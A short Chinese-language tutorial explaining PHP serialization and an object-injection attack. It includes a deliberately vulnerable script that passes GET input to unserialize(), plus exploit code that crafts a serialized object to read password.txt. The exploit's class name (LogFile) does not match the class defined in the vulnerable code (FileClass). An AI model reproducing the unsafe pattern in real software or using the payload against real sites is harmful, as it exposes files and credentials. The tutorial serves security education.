个人感觉参数可控是很多安全问题的根源
序列化是啥
就理解成方便数据运输做的一种压缩优化就行
比方说一个
$stooges = array('Moe','Larry','Curly');
$new = serialize($stooges);
print_r($new);
echo "<br />";
print_r(unserialize($new));
结果:
a:3:{i:0;s:3:"Moe";i:1;s:5:"Larry";i:2;s:5:"Curly";}
可以看出来乱七八糟的对象最终简化为字符串
所以可以猜出来咋用了
就是构造语句进行序列化
然后在对应进行反序列化的接口
利用变量可控性执行命令
这个过程中
两个比较注意的地方
一个是
魔术方法
即通过反序列化调用生成对象执行析构函数等
利用接口对应变量的不安全权限
对构造析构toString等方法进行利用
比如web Application 源码如下
<?php
include 'logfile.php';
class FileClass
{
public $filename = 'error.log';
public function __toString()
{
return file_get_contents($this->filename);
}
}
class User
{
public $age = 0;
public $name = '';
public function __toString()
{
return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
$obj = unserialize($_GET['usr_serialized']);
echo $obj;
?>
则可构造利用代码如下生成请求命令
<?php
include 'logfile.php';
$obj = new LogFile();
$obj->filename = 'password.txt';
echo serialize($obj) . '<br />';
?>
可见这个例子利用了logfile中filename的低权限接口
通过反序列化调用了新对象toString接口
从而打印了password.txt 的内容